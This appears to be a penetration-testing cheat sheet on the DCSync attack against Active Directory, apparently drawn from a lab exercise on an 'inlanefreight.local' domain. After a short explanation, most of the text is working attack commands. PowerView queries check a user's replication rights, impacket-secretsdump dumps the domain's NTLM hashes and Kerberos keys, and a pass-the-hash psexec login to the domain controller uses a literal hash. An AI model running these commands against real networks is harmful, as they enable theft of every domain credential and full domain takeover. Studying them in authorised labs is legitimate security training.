dcsync-abuse

DCSync attack can be performed using tools such as mimikatz, Invoke-DCSync, secretdump.py or Secretdump.exe

DCSync is a technique for stealing the Active Directory password database by using the built-in Directory Replication Service Remote Protocol, which is used by Domain Controllers to replicate domain data. This allows an attacker to mimic a Domain Controller to retrieve user NTLM password hashes.

The crux of the attack is requesting a Domain Controller to replicate passwords via the DS-Replication-Get-Changes-All extended right. This is an extended access control right within AD, which allows for the replication of secret data.

Get user's group membership (import powerview)

Get-DomainUser -Identity adunn  |select samaccountname,objectsid,memberof,useraccountcontrol |fl

Get user's replication rights

$sid = "S-1-5-21-3842939050-3880317879-2865463114-1164"            #(user SID)

Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl

Perform DCSync attack (impacket-secretsdump)

impacket-secretsdump <DC_Domain_Name>/<user>:<pass>@<DC_IP> -outputfile domain_hashes

Login on DC

proxychains impacket-psexec INLANEFREIGHT.LOCAL/administrator@172.16.6.3 -hashes :27dedb1dab4d8545c6e1c66fba077da0

Extracting NTLM hashes and kerberos keys using secretsdump.py (extract NTDS file)

impacket-secretsdump -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5

Tool options

• -just-dc-ntlm - If we only want want NTLM hashes

• -just-dc-user <username> - extract data for specific user

• -pwd-last-set - last password change

• -history - dump password history